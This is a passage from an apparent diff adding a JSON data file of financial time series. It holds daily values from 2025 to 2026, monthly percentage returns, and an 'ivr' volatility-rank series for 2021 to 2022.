"2025-06-18", + 15879.251192363132 + ], + [ + "2025-06-20", + 15814.415799827515 + ], + [ + "2025-06-23", + 15977.0262118757 + ], + [ + "2025-06-24", + 16221.348696567804 + ], + [ + "2025-06-25", + 16262.815953332214 + ], + [ + "2025-06-26", + 16414.87913069725 + ], + [ + "2025-06-27", + 16471.07643191966 + ], + [ + "2025-06-30", + 16577.760173483508 + ], + [ + "2025-07-01", + 16438.01897931525 + ], + [ + "2025-07-02", + 16552.51603280008 + ], + [ + "2025-07-03", + 16715.397075586337 + ], + [ + "2025-07-07", + 16589.481982390407 + ], + [ + "2025-07-08", + 16598.79757106151 + ], + [ + "2025-07-09", + 16716.29917804658 + ], + [ + "2025-07-10", + 16692.259067993764 + ], + [ + "2025-07-11", + 16654.692944113554 + ], + [ + "2025-07-14", + 16715.098829466828 + ], + [ + "2025-07-15", + 16730.42168411299 + ], + [ + "2025-07-16", + 16747.552425730504 + ], + [ + "2025-07-17", + 16883.0850357679 + ], + [ + "2025-07-18", + 16866.858237636065 + ], + [ + "2025-07-21", + 16954.3087865424 + ], + [ + "2025-07-22", + 16866.558150491124 + ], + [ + "2025-07-23", + 16943.490921121174 + ], + [ + "2025-07-24", + 16979.5510862004 + ], + [ + "2025-07-25", + 17020.421850725794 + ], + [ + "2025-07-28", + 17073.61643947339 + ], + [ + "2025-07-29", + 17047.170109184775 + ], + [ + "2025-07-30", + 17070.00802963241 + ], + [ + "2025-07-31", + 16979.5510862004 + ], + [ + "2025-08-01", + 16645.077268297515 + ], + [ + "2025-08-04", + 16952.20449447697 + ], + [ + "2025-08-05", + 16837.107266702267 + ], + [ + "2025-08-06", + 17048.972473079837 + ], + [ + "2025-08-07", + 17106.670210026943 + ], + [ + "2025-08-08", + 17266.24661216802 + ], + [ + "2025-08-11", + 17215.15631548585 + ], + [ + "2025-08-12", + 17431.530193139217 + ], + [ + "2025-08-13", + 17440.24744854587 + ], + [ + "2025-08-14", + 17426.72327574391 + ], + [ + "2025-08-15", + 17350.09243328423 + ], + [ + "2025-08-18", + 17343.179382798065 + ], + [ + "2025-08-19", + 17107.874240657555 + ], + [ + "2025-08-20", + 17006.299344659383 + ], + [ + "2025-08-21", + 16927.564210134275 + ], + [ + "2025-08-22", + 17188.711826222665 + ], + [ + "2025-08-25", + 17139.129329366904 + ], + [ + "2025-08-26", + 17207.943177854748 + ], + [ + "2025-08-27", + 17234.39134916879 + ], + [ + "2025-08-28", + 17342.27728033782 + ], + [ + "2025-08-29", + 17141.531867551843 + ], + [ + "2025-09-02", + 16997.885858448524 + ], + [ + "2025-09-03", + 17131.614263565436 + ], + [ + "2025-09-04", + 17286.680153405287 + ], + [ + "2025-09-05", + 17311.624206943776 + ], + [ + "2025-09-08", + 17396.070202349867 + ], + [ + "2025-09-09", + 17445.354453086115 + ], + [ + "2025-09-10", + 17451.065313967098 + ], + [ + "2025-09-11", + 17552.64020996527 + ], + [ + "2025-09-12", + 17630.173154885193 + ], + [ + "2025-09-15", + 17781.032301619616 + ], + [ + "2025-09-16", + 17766.00585206753 + ], + [ + "2025-09-17", + 17730.54586127818 + ], + [ + "2025-09-18", + 17890.422350564197 + ], + [ + "2025-09-19", + 18011.528685339388 + ], + [ + "2025-09-22", + 18118.157196140364 + ], + [ + "2025-09-23", + 17997.811204867376 + ], + [ + "2025-09-24", + 17934.629053167064 + ], + [ + "2025-09-25", + 17857.307826171484 + ], + [ + "2025-09-26", + 17930.71687413029 + ], + [ + "2025-09-29", + 18013.756326108567 + ], + [ + "2025-09-30", + 18063.099489658547 + ], + [ + "2025-10-01", + 18149.747351477807 + ], + [ + "2025-10-02", + 18224.36227109265 + ], + [ + "2025-10-03", + 18147.643059412378 + ], + [ + "2025-10-06", + 18283.934171926554 + ], + [ + "2025-10-07", + 18187.657747113248 + ], + [ + "2025-10-08", + 18396.157559006475 + ], + [ + "2025-10-09", + 18373.894038492712 + ], + [ + "2025-10-10", + 17736.057891412824 + ], + [ + "2025-10-13", + 18112.440812183097 + ], + [ + "2025-10-14", + 17991.79473376517 + ], + [ + "2025-10-15", + 18118.759211455672 + ], + [ + "2025-10-16", + 18051.66672174401 + ], + [ + "2025-10-17", + 18170.206667071077 + ], + [ + "2025-10-20", + 18399.16579455758 + ], + [ + "2025-10-21", + 18394.353354085986 + ], + [ + "2025-10-22", + 18217.14176935983 + ], + [ + "2025-10-23", + 18370.283787626304 + ], + [ + "2025-10-24", + 18566.44688811932 + ], + [ + "2025-10-27", + 18897.100578256883 + ], + [ + "2025-10-28", + 19042.418238449798 + ], + [ + "2025-10-29", + 19128.16583883424 + ], + [ + "2025-10-30", + 18835.72263147706 + ], + [ + "2025-10-31", + 18926.586441528896 + ], + [ + "2025-11-03", + 19017.1446413595 + ], + [ + "2025-11-04", + 18631.13315759518 + ], + [ + "2025-11-05", + 18752.38493337927 + ], + [ + "2025-11-06", + 18403.077973594358 + ], + [ + "2025-11-07", + 18345.010190536006 + ], + [ + "2025-11-10", + 18750.878974578292 + ], + [ + "2025-11-11", + 18700.935636738435 + ], + [ + "2025-11-12", + 18686.19270510243 + ], + [ + "2025-11-13", + 18304.695415690196 + ], + [ + "2025-11-14", + 18318.534403840527 + ], + [ + "2025-11-17", + 18162.084062878013 + ], + [ + "2025-11-18", + 17940.945611414212 + ], + [ + "2025-11-19", + 18048.054629852173 + ], + [ + "2025-11-20", + 17620.824427756368 + ], + [ + "2025-11-21", + 17753.207043284627 + ], + [ + "2025-11-24", + 18207.213119220847 + ], + [ + "2025-11-25", + 18319.4383473262 + ], + [ + "2025-11-26", + 18481.303144075613 + ], + [ + "2025-11-28", + 18631.13315759518 + ], + [ + "2025-12-01", + 18568.553021210177 + ], + [ + "2025-12-02", + 18713.870681403092 + ], + [ + "2025-12-03", + 18759.603594086664 + ], + [ + "2025-12-04", + 18742.15435506992 + ], + [ + "2025-12-05", + 18818.573479605257 + ], + [ + "2025-12-08", + 18782.469129915735 + ], + [ + "2025-12-09", + 18805.634752889742 + ], + [ + "2025-12-10", + 18882.657733765816 + ], + [ + "2025-12-11", + 18821.58355618179 + ], + [ + "2025-12-12", + 18461.745930942583 + ], + [ + "2025-12-15", + 18369.07975699569 + ], + [ + "2025-12-16", + 18405.484193830154 + ], + [ + "2025-12-17", + 18064.301679263728 + ], + [ + "2025-12-18", + 18326.054992718284 + ], + [ + "2025-12-19", + 18564.944611369196 + ], + [ + "2025-12-22", + 18653.934257534234 + ], + [ + "2025-12-23", + 18741.296437219975 + ], + [ + "2025-12-24", + 18796.125856548588 + ], + [ + "2025-12-26", + 18794.919984892545 + ], + [ + "2025-12-29", + 18703.94203126411 + ], + [ + "2025-12-30", + 18660.560108053465 + ], + [ + "2025-12-31", + 18506.31899760584 + ], + [ + "2026-01-02", + 18470.470550450955 + ], + [ + "2026-01-05", + 18617.18002586825 + ], + [ + "2026-01-06", + 18780.760658317555 + ], + [ + "2026-01-07", + 18798.83768700561 + ], + [ + "2026-01-08", + 18691.89067880541 + ], + [ + "2026-01-09", + 18878.06621634571 + ], + [ + "2026-01-12", + 18893.731501721682 + ], + [ + "2026-01-13", + 18865.71477674207 + ], + [ + "2026-01-14", + 18664.17588199616 + ], + [ + "2026-01-15", + 18731.356740928415 + ], + [ + "2026-01-16", + 18715.691455552445 + ], + [ + "2026-01-20", + 18318.035485949247 + ], + [ + "2026-01-21", + 18565.666293337392 + ], + [ + "2026-01-22", + 18700.62818549178 + ], + [ + "2026-01-23", + 18759.67355305297 + ], + [ + "2026-01-26", + 18842.217769190825 + ], + [ + "2026-01-27", + 19013.028108500097 + ], + [ + "2026-01-28", + 19075.98933714892 + ], + [ + "2026-01-29", + 18961.81446311418 + ], + [ + "2026-01-30", + 18734.06673036001 + ], + [ + "2026-02-02", + 18862.702859140107 + ], + [ + "2026-02-03", + 18572.896000197357 + ], + [ + "2026-02-04", + 18248.446565755767 + ], + [ + "2026-02-05", + 17985.754329332387 + ], + [ + "2026-02-06", + 18365.935285562835 + ], + [ + "2026-02-09", + 18506.620925776206 + ], + [ + "2026-02-10", + 18420.76286386602 + ], + [ + "2026-02-11", + 18470.168622280587 + ], + [ + "2026-02-12", + 18094.50554245308 + ], + [ + "2026-02-13", + 18133.065820064985 + ], + [ + "2026-02-17", + 18114.386776061627 + ], + [ + "2026-02-18", + 18249.65059638638 + ], + [ + "2026-02-19", + 18179.75974802253 + ], + [ + "2026-02-20", + 18340.630391040246 + ], + [ + "2026-02-23", + 18117.700621833956 + ], + [ + "2026-02-24", + 18312.311737890264 + ], + [ + "2026-02-25", + 18577.71580477067 + ], + [ + "2026-02-26", + 18353.583845959194 + ], + [ + "2026-02-27", + 18294.838565542945 + ], + [ + "2026-03-02", + 18318.939429434922 + ], + [ + "2026-03-03", + 18122.82419560306 + ], + [ + "2026-03-04", + 18399.073743286124 + ], + [ + "2026-03-05", + 18343.640467616777 + ], + [ + "2026-03-06", + 18067.69284810408 + ], + [ + "2026-03-09", + 18308.997892117935 + ], + [ + "2026-03-10", + 18309.299820288303 + ], + [ + "2026-03-11", + 18306.88991800165 + ], + [ + "2026-03-12", + 17992.68210802198 + ], + [ + "2026-03-13", + 17886.037027992148 + ], + [ + "2026-03-16", + 18086.67197925238 + ], + [ + "2026-03-17", + 18174.939943449222 + ], + [ + "2026-03-18", + 17921.587229027522 + ], + [ + "2026-03-19", + 17864.94992272756 + ], + [ + "2026-03-20", + 17534.774899201555 + ], + [ + "2026-03-23", + 17736.056050387393 + ], + [ + "2026-03-24", + 17614.798751527014 + ], + [ + "2026-03-25", + 17730.626866397062 + ], + [ + "2026-03-26", + 17307.43403306721 + ], + [ + "2026-03-27", + 16969.303938662186 + ], + [ + "2026-03-30", + 16839.601856158657 + ], + [ + "2026-03-31", + 17409.68826744871 + ], + [ + "2026-04-01", + 17624.753176022004 + ], + [ + "2026-04-02", + 17644.962112156925 + ], + [ + "2026-04-06", + 17751.137730702347 + ], + [ + "2026-04-07", + 17753.85324321023 + ], + [ + "2026-04-08", + 18281.712054233663 + ], + [ + "2026-04-09", + 18405.381096406127 + ], + [ + "2026-04-10", + 18431.92500104248 + ], + [ + "2026-04-13", + 18622.557661146566 + ], + [ + "2026-04-14", + 18960.68775555159 + ], + [ + "2026-04-15", + 19226.126801915147 + ], + [ + "2026-04-16", + 19318.726698946593 + ], + [ + "2026-04-17", + 19571.495808307278 + ], + [ + "2026-04-20", + 19509.35935905068 + ], + [ + "2026-04-21", + 19435.158670157372 + ], + [ + "2026-04-22", + 19760.318740414587 + ], + [ + "2026-04-23", + 19649.015866049198 + ] + ], + "monthly_pct": [ + [ + "2021-05-31", + -0.03227813542020508 + ], + [ + "2021-06-30", + 0.6064490958604507 + ], + [ + "2021-07-31", + 0.24662697723030202 + ], + [ + "2021-08-31", + 0.2583862788740898 + ], + [ + "2021-09-30", + -1.0590963648558382 + ], + [ + "2021-10-31", + 0.7045623959368141 + ], + [ + "2021-11-30", + -0.1352392961090909 + ], + [ + "2021-12-31", + 1.818415878059887 + ], + [ + "2022-01-31", + -6.484474249294337 + ], + [ + "2022-02-28", + 1.5789538406677073 + ], + [ + "2022-03-31", + -0.05519692510769225 + ], + [ + "2022-04-30", + -5.603138186140266 + ], + [ + "2022-05-31", + 0.4998524501784951 + ], + [ + "2022-06-30", + 0.8009204363736533 + ], + [ + "2022-07-31", + 2.5613902323392335 + ], + [ + "2022-08-31", + -1.5448656236799918 + ], + [ + "2022-09-30", + 0.9781687937933103 + ], + [ + "2022-10-31", + 0.9794876100709171 + ], + [ + "2022-11-30", + 0.8015536970065407 + ], + [ + "2022-12-31", + -0.7122245677800065 + ], + [ + "2023-01-31", + 0.7484891811389449 + ], + [ + "2023-02-28", + -0.23793446554383202 + ], + [ + "2023-03-31", + 0.722956101557215 + ], + [ + "2023-04-30", + 0.22311251152478118 + ], + [ + "2023-05-31", + 0.2583862788740454 + ], + [ + "2023-06-30", + 0.24662697723027982 + ], + [ + "2023-07-31", + 0.2348690548344079 + ], + [ + "2023-08-31", + 0.2701469599276196 + ], + [ + "2023-09-30", + 0.2348690548344523 + ], + [ + "2023-10-31", + 0.32117152300110696 + ], + [ + "2023-11-30", + 0.5308221164620708 + ], + [ + "2023-12-31", + 0.2348690548344079 + ], + [ + "2024-01-31", + 0.348619651285631 + ], + [ + "2024-02-29", + 0.707450936965337 + ], + [ + "2024-03-31", + 0.8292673610754697 + ], + [ + "2024-04-30", + 0.6804642733803545 + ], + [ + "2024-05-31", + 0.8055354178848173 + ], + [ + "2024-06-30", + 0.33833782201233564 + ], + [ + "2024-07-31", + 0.9181723567591726 + ], + [ + "2024-08-31", + 3.4966264450803974 + ], + [ + "2024-09-30", + 1.3524709658320866 + ], + [ + "2024-10-31", + 0.6824093846593327 + ], + [ + "2024-11-30", + 0.7918728480769577 + ], + [ + "2024-12-31", + -0.6287404706507238 + ], + [ + "2025-01-31", + 3.096578340375933 + ], + [ + "2025-02-28", + -0.08221717376012405 + ], + [ + "2025-03-31", + -4.092541860447152 + ], + [ + "2025-04-30", + -1.3867140677627288 + ], + [ + "2025-05-31", + 2.54629294462283 + ], + [ + "2025-06-30", + 0.49171065706494765 + ], + [ + "2025-07-31", + 0.2583862788740898 + ], + [ + "2025-08-31", + 0.24662697723025762 + ], + [ + "2025-09-30", + 0.24662697723025762 + ], + [ + "2025-10-31", + 1.1575862270056136 + ], + [ + "2025-11-30", + 2.12766549292438 + ], + [ + "2025-12-31", + 1.4521264373150489 + ], + [ + "2026-01-31", + 0.2348690548344079 + ], + [ + "2026-02-28", + 1.064808635378145 + ], + [ + "2026-03-31", + 1.1341659427353656 + ], + [ + "2026-04-30", + 1.1546219894529308 + ] + ], + "ivr": [ + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 50.0 + ], + [ + "2021-04-28", + 50.0 + ], + [ + "2021-04-29", + 50.0 + ], + [ + "2021-04-30", + 50.0 + ], + [ + "2021-05-03", + 50.0 + ], + [ + "2021-05-04", + 50.0 + ], + [ + "2021-05-05", + 50.0 + ], + [ + "2021-05-06", + 50.0 + ], + [ + "2021-05-07", + 50.0 + ], + [ + "2021-05-10", + 50.0 + ], + [ + "2021-05-11", + 50.0 + ], + [ + "2021-05-12", + 50.0 + ], + [ + "2021-05-13", + 50.0 + ], + [ + "2021-05-14", + 50.0 + ], + [ + "2021-05-17", + 50.0 + ], + [ + "2021-05-18", + 50.0 + ], + [ + "2021-05-19", + 50.0 + ], + [ + "2021-05-20", + 50.0 + ], + [ + "2021-05-21", + 50.0 + ], + [ + "2021-05-24", + 50.0 + ], + [ + "2021-05-25", + 0.0 + ], + [ + "2021-05-26", + 100.0 + ], + [ + "2021-05-27", + 23.736849005146638 + ], + [ + "2021-05-28", + 0.0 + ], + [ + "2021-06-01", + 0.0 + ], + [ + "2021-06-02", + 0.0 + ], + [ + "2021-06-03", + 29.355236784208742 + ], + [ + "2021-06-04", + 95.6825091622464 + ], + [ + "2021-06-07", + 80.85535553444385 + ], + [ + "2021-06-08", + 0.0 + ], + [ + "2021-06-09", + 0.0 + ], + [ + "2021-06-10", + 0.0 + ], + [ + "2021-06-11", + 0.0 + ], + [ + "2021-06-14", + 0.0 + ], + [ + "2021-06-15", + 0.6660104064518915 + ], + [ + "2021-06-16", + 0.0 + ], + [ + "2021-06-17", + 5.6779206070768025 + ], + [ + "2021-06-18", + 0.0 + ], + [ + "2021-06-21", + 0.0 + ], + [ + "2021-06-22", + 0.0 + ], + [ + "2021-06-23", + 0.1569185391684184 + ], + [ + "2021-06-24", + 1.0450738069756003 + ], + [ + "2021-06-25", + 0.0 + ], + [ + "2021-06-28", + 5.2785153258034665 + ], + [ + "2021-06-29", + 2.740148821796858 + ], + [ + "2021-06-30", + 3.9921816696727217 + ], + [ + "2021-07-01", + 0.0 + ], + [ + "2021-07-02", + 0.0 + ], + [ + "2021-07-06", + 0.06096201455649441 + ], + [ + "2021-07-07", + 0.0 + ], + [ + "2021-07-08", + 4.739813049684592 + ], + [ + "2021-07-09", + 1.9801429028868893 + ], + [ + "2021-07-12", + 2.0550144083472195 + ], + [ + "2021-07-13", + 0.0 + ], + [ + "2021-07-14", + 0.0 + ], + [ + "2021-07-15", + 3.485944892603532 + ], + [ + "2021-07-16", + 3.952441977560456 + ], + [ + "2021-07-19", + 3.994518684695164 + ], + [ + "2021-07-20", + 7.958682204665106 + ], + [ + "2021-07-21", + 6.635806647127257 + ], + [ + "2021-07-22", + 7.933974006390229 + ], + [ + "2021-07-23", + 11.522329350293175 + ], + [ + "2021-07-26", + 10.845795221017056 + ], + [ + "2021-07-27", + 15.000975125708557 + ], + [ + "2021-07-28", + 14.974356551591969 + ], + [ + "2021-07-29", + 14.461123500770285 + ], + [ + "2021-07-30", + 16.698746731021714 + ], + [ + "2021-08-02", + 10.955562173815316 + ], + [ + "2021-08-03", + 11.610491002842469 + ], + [ + "2021-08-04", + 11.555640290160532 + ], + [ + "2021-08-05", + 10.263059856485139 + ], + [ + "2021-08-06", + 10.926043451969377 + ], + [ + "2021-08-09", + 10.351229717780537 + ], + [ + "2021-08-10", + 12.184160283124294 + ], + [ + "2021-08-11", + 12.397535093815213 + ], + [ + "2021-08-12", + 9.514276746093572 + ], + [ + "2021-08-13", + 4.413398733587209 + ], + [ + "2021-08-16", + 0.0 + ], + [ + "2021-08-17", + 0.899674287356122 + ], + [ + "2021-08-18", + 4.38230507918264 + ], + [ + "2021-08-19", + 2.724128323173684 + ], + [ + "2021-08-20", + 1.6623577431886503 + ], + [ + "2021-08-23", + 14.265559787392862 + ], + [ + "2021-08-24", + 6.37879638288013 + ], + [ + "2021-08-25", + 6.0773793927418005 + ], + [ + "2021-08-26", + 8.703466371201197 + ], + [ + "2021-08-27", + 10.769871304550813 + ], + [ + "2021-08-30", + 15.363665289069592 + ], + [ + "2021-08-31", + 14.991329902100814 + ], + [ + "2021-09-01", + 14.990801030539878 + ], + [ + "2021-09-02", + 14.023418950557923 + ], + [ + "2021-09-03", + 12.126655722622303 + ], + [ + "2021-09-07", + 12.137119541266372 + ], + [ + "2021-09-08", + 11.057986163258372 + ], + [ + "2021-09-09", + 11.969511243220355 + ], + [ + "2021-09-10", + 16.265915342507718 + ], + [ + "2021-09-13", + 16.19009648305971 + ], + [ + "2021-09-14", + 16.96826488676053 + ], + [ + "2021-09-15", + 13.523912410155022 + ], + [ + "2021-09-16", + 5.717291620810854 + ], + [ + "2021-09-17", + 15.80572699639638 + ], + [ + "2021-09-20", + 33.307001336576775 + ], + [ + "2021-09-21", + 21.82054481339026 + ], + [ + "2021-09-22", + 26.541542728435125 + ], + [ + "2021-09-23", + 30.96793752028985 + ], + [ + "2021-09-24", + 29.488683442826968 + ], + [ + "2021-09-27", + 27.5798899270759 + ], + [ + "2021-09-28", + 50.37242573827873 + ], + [ + "2021-09-29", + 50.25933639583408 + ], + [ + "2021-09-30", + 49.41325315778236 + ], + [ + "2021-10-01", + 52.342241109954855 + ], + [ + "2021-10-04", + 62.1198805343294 + ], + [ + "2021-10-05", + 70.7689256395335 + ], + [ + "2021-10-06", + 73.89903334633811 + ], + [ + "2021-10-07", + 78.22768626711863 + ], + [ + "2021-10-08", + 77.5679434634025 + ], + [ + "2021-10-11", + 78.3918690406707 + ], + [ + "2021-10-12", + 78.41828488807366 + ], + [ + "2021-10-13", + 78.69321281858439 + ], + [ + "2021-10-14", + 91.42928328474673 + ], + [ + "2021-10-15", + 89.49227820771225 + ], + [ + "2021-10-18", + 79.02574235451539 + ], + [ + "2021-10-19", + 80.25600982072037 + ], + [ + "2021-10-20", + 77.91762120430269 + ], + [ + "2021-10-21", + 76.41393829398756 + ], + [ + "2021-10-22", + 78.94563119582146 + ], + [ + "2021-10-25", + 79.42462921288364 + ], + [ + "2021-10-26", + 47.82685590148495 + ], + [ + "2021-10-27", + 46.845881245721216 + ], + [ + "2021-10-28", + 47.34281700625047 + ], + [ + "2021-10-29", + 47.156883327280966 + ], + [ + "2021-11-01", + 19.33187225914956 + ], + [ + "2021-11-02", + 15.577677628003517 + ], + [ + "2021-11-03", + 17.41244717522633 + ], + [ + "2021-11-04", + 19.656792740377977 + ], + [ + "2021-11-05", + 15.044903051546546 + ], + [ + "2021-11-08", + 8.497444920346101 + ], + [ + "2021-11-09", + 12.645196351971757 + ], + [ + "2021-11-10", + 30.90032259980403 + ], + [ + "2021-11-11", + 20.02350809774744 + ], + [ + "2021-11-12", + 22.345426284240773 + ], + [ + "2021-11-15", + 20.45982466538222 + ], + [ + "2021-11-16", + 20.27061009620316 + ], + [ + "2021-11-17", + 19.78190817663263 + ], + [ + "2021-11-18", + 21.99281251804568 + ], + [ + "2021-11-19", + 14.63752659214098 + ], + [ + "2021-11-22", + 23.94129195652213 + ], + [ + "2021-11-23", + 26.451941557092677 + ], + [ + "2021-11-24", + 26.47201430033008 + ], + [ + "2021-11-26", + 41.01684653988394 + ], + [ + "2021-11-29", + 55.69180368285232 + ], + [ + "2021-11-30", + 64.58664559578384 + ], + [ + "2021-12-01", + 74.52484430395312 + ], + [ + "2021-12-02", + 71.9743611681158 + ], + [ + "2021-12-03", + 73.93894814916334 + ], + [ + "2021-12-06", + 76.6738989700229 + ], + [ + "2021-12-07", + 100.0 + ], + [ + "2021-12-08", + 99.14194788514152 + ], + [ + "2021-12-09", + 98.96977258548468 + ], + [ + "2021-12-10", + 100.0 + ], + [ + "2021-12-13", + 100.0 + ], + [ + "2021-12-14", + 100.0 + ], + [ + "2021-12-15", + 100.0 + ], + [ + "2021-12-16", + 100.0 + ], + [ + "2021-12-17", + 97.79068831018807 + ], + [ + "2021-12-20", + 97.63435157028091 + ], + [ + "2021-12-21", + 100.0 + ], + [ + "2021-12-22", + 100.0 + ], + [ + "2021-12-23", + 100.0 + ], + [ + "2021-12-27", + 97.9779412342479 + ], + [ + "2021-12-28", + 92.47968882486448 + ], + [ + "2021-12-29", + 88.96180030772273 + ], + [ + "2021-12-30", + 83.75727182135086 + ], + [ + "2021-12-31", + 84.34355683375281 + ], + [ + "2022-01-03", + 79.61647535097288 + ], + [ + "2022-01-04", + 82.770948605202 + ], + [ + "2022-01-05", + 83.22752951350876 + ], + [ + "2022-01-06", + 82.56807131738518 + ], + [ + "2022-01-07", + 81.30494184602522 + ], + [ + "2022-01-10", + 78.9421374357763 + ], + [ + "2022-01-11", + 80.50313388103237 + ], + [ + "2022-01-12", + 79.24873288983608 + ], + [ + "2022-01-13", + 79.0842315933965 + ], + [ + "2022-01-14", + 69.80310614230767 + ], + [ + "2022-01-18", + 78.6889577347277 + ], + [ + "2022-01-19", + 79.18724228517509 + ], + [ + "2022-01-20", + 70.00654059180216 + ], + [ + "2022-01-21", + 75.01159925968243 + ], + [ + "2022-01-24", + 73.69606896038863 + ], + [ + "2022-01-25", + 70.14996253721502 + ], + [ + "2022-01-26", + 70.79995341880512 + ], + [ + "2022-01-27", + 69.90698020787605 + ], + [ + "2022-01-28", + 94.0576006221475 + ], + [ + "2022-01-31", + 100.0 + ], + [ + "2022-02-01", + 99.04215660177668 + ], + [ + "2022-02-02", + 99.80056668857205 + ], + [ + "2022-02-03", + 100.0 + ], + [ + "2022-02-04", + 100.0 + ], + [ + "2022-02-07", + 99.60111939204572 + ], + [ + "2022-02-08", + 100.0 + ], + [ + "2022-02-09", + 100.0 + ], + [ + "2022-02-10", + 100.0 + ], + [ + "2022-02-11", + 100.0 + ], + [ + "2022-02-14", + 99.4961774619791 + ], + [ + "2022-02-15", + 100.0 + ], + [ + "2022-02-16", + 99.19492483707046 + ], + [ + "2022-02-17", + 100.0 + ], + [ + "2022-02-18", + 95.32388965471608 + ], + [ + "2022-02-22", + 95.57595829951823 + ], + [ + "2022-02-23", + 95.90913576891124 + ], + [ + "2022-02-24", + 100.0 + ], + [ + "2022-02-25", + 100.0 + ], + [ + "2022-02-28", + 93.27378236115636 + ], + [ + "2022-03-01", + 85.97647919295659 + ], + [ + "2022-03-02", + 88.00645098437614 + ], + [ + "2022-03-03", + 88.01672873689934 + ], + [ + "2022-03-04", + 78.04382811633059 + ], + [ + "2022-03-07", + 85.39910959028282 + ], + [ + "2022-03-08", + 85.33150648624701 + ], + [ + "2022-03-09", + 95.31522854821458 + ], + [ + "2022-03-10", + 91.15317628339461 + ], + [ + "2022-03-11", + 90.79890295540598 + ], + [ + "2022-03-14", + 87.04025927317741 + ], + [ + "2022-03-15", + 95.63082328853262 + ], + [ + "2022-03-16", + 100.0 + ], + [ + "2022-03-17", + 100.0 + ], + [ + "2022-03-18", + 97.20037756888088 + ], + [ + "2022-03-21", + 96.22684528146401 + ], + [ + "2022-03-22", + 97.23421175950173 + ], + [ + "2022-03-23", + 93.63975120804561 + ], + [ + "2022-03-24", + 89.93867346936393 + ], + [ + "2022-03-25", + 88.75254060894495 + ], + [ + "2022-03-28", + 89.90203656216188 + ], + [ + "2022-03-29", + 88.64272799025163 + ], + [ + "2022-03-30", + 88.9295442592611 + ], + [ + "2022-03-31", + 88.89607203794995 + ], + [ + "2022-04-01", + 86.8013207657214 + ], + [ + "2022-04-04", + 74.83691618099515 + ], + [ + "2022-04-05", + 80.23944899911278 + ], + [ + "2022-04-06", + 77.9212506054996 + ], + [ + "2022-04-07", + 76.3870159112495 + ], + [ + "2022-04-08", + 74.00333149798115 + ], + [ + "2022-04-11", + 75.71152347128869 + ], + [ + "2022-04-12", + 69.57587970909105 + ], + [ + "2022-04-13", + 61.08247285641605 + ], + [ + "2022-04-14", + 64.6720836486122 + ], + [ + "2022-04-18", + 60.3161886878275 + ], + [ + "2022-04-19", + 64.94150594303919 + ], + [ + "2022-04-20", + 62.63681774369303 + ], + [ + "2022-04-21", + 64.08700504626117 + ], + [ + "2022-04-22", + 63.015142743418174 + ], + [ + "2022-04-25", + 65.45241146486951 + ], + [ + "2022-04-26", + 70.60188489517937 + ], + [ + "2022-04-27", + 65.73027974778542 + ], + [ + "2022-04-28", + 80.16496749365382 + ], + [ + "2022-04-29", + 90.21542145026609 + ], + [ + "2022-05-02", + 93.51437075482832 + ], + [ + "2022-05-03", + 88.56520895652015 + ], + [ + "2022-05-04", + 97.21841254100015 + ], + [ + "2022-05-05", + 100.0 + ], + [ + "2022-05-06", + 99.77599948091522 + ], + [ + "2022-05-09", + 100.0 + ], + [ + "2022-05-10", + 100.0 + ], + [ + "2022-05-11", + 100.0 + ], + [ + "2022-05-12", + 96.24074579380552 + ], + [ + "2022-05-13", + 100.0 + ], + [ + "2022-05-16", + 99.89001904475974 + ], + [ + "2022-05-17", + 100.0 + ], + [ + "2022-05-18", + 100.0 + ], + [ + "2022-05-19", + 99.39481269107105 + ], + [ + "2022-05-20", + 97.80863786585793 + ], + [ + "2022-05-23", + 98.47076384787623 + ], + [ + "2022-05-24", + 95.19959656079558 + ], + [ + "2022-05-25", + 96.45545449769335 + ], + [ + "2022-05-26", + 94.28938340298004 + ], + [ + "2022-05-27", + 92.23896045435177 + ], + [ + "2022-05-31", + 91.06840084037171 + ], + [ + "2022-06-01", + 91.20644331339014 + ], + [ + "2022-06-02", + 89.55506700438086 + ], + [ + "2022-06-03", + 81.91129566261031 + ], + [ + "2022-06-06", + 81.44390595559933 + ], + [ + "2022-06-07", + 73.76044830236992 + ], + [ + "2022-06-08", + 73.65337264387423 + ], + [ + "2022-06-09", + 72.89498514751561 + ], + [ + "2022-06-10", + 79.28598047925864 + ], + [ + "2022-06-13", + 81.37925150365609 + ], + [ + "2022-06-14", + 81.37332278061406 + ], + [ + "2022-06-15", + 81.06602310355001 + ], + [ + "2022-06-16", + 77.9541765083744 + ], + [ + "2022-06-17", + 79.00214428535395 + ], + [ + "2022-06-21", + 82.39454823788898 + ], + [ + "2022-06-22", + 80.89561867766994 + ], + [ + "2022-06-23", + 80.15655453899217 + ], + [ + "2022-06-24", + 84.8801947631399 + ], + [ + "2022-06-27", + 81.60096068481556 + ], + [ + "2022-06-28", + 79.47481100718136 + ], + [ + "2022-06-29", + 79.56481621419553 + ], + [ + "2022-06-30", + 79.78738396265219 + ], + [ + "2022-07-01", + 75.41046580171779 + ], + [ + "2022-07-05", + 75.187795042993 + ], + [ + "2022-07-06", + 75.36786576603822 + ], + [ + "2022-07-07", + 77.45540908342778 + ], + [ + "2022-07-08", + 77.40649344635017 + ], + [ + "2022-07-11", + 76.10799233018632 + ], + [ + "2022-07-12", + 70.3994751625935 + ], + [ + "2022-07-13", + 58.08474201837136 + ], + [ + "2022-07-14", + 58.09683947320556 + ], + [ + "2022-07-15", + 56.6301162552074 + ], + [ + "2022-07-18", + 44.9998178015573 + ], + [ + "2022-07-19", + 48.963445659922606 + ], + [ + "2022-07-20", + 47.01540980746395 + ], + [ + "2022-07-21", + 47.50256864916696 + ], + [ + "2022-07-22", + 49.806662056400505 + ], + [ + "2022-07-25", + 42.54571312447446 + ], + [ + "2022-07-26", + 45.17300327835551 + ], + [ + "2022-07-27", + 48.61088093525336 + ], + [ + "2022-07-28", + 48.721032319956436 + ], + [ + "2022-07-29", + 47.9444298233888 + ], + [ + "2022-08-01", + 48.212638635553155 + ], + [ + "2022-08-02", + 47.67151451718149 + ], + [ + "2022-08-03", + 50.78794039307313 + ], + [ + "2022-08-04", + 49.20252327776054 + ], + [ + "2022-08-05", + 50.1900287907739 + ], + [ + "2022-08-08", + 46.00024415821712 + ], + [ + "2022-08-09", + 46.388001169536416 + ], + [ + "2022-08-10", + 49.117533816676875 + ], + [ + "2022-08-11", + 49.93634799816404 + ], + [ + "2022-08-12", + 50.13863337107408 + ], + [ + "2022-08-15", + 48.76190809428131 + ], + [ + "2022-08-16", + 45.4711875112901 + ], + [ + "2022-08-17", + 46.21897477631084 + ], + [ + "2022-08-18", + 45.474082285084954 + ], + [ + "2022-08-19", + 46.122722095699345 + ], + [ + "2022-08-22", + 50.814297872794455 + ], + [ + 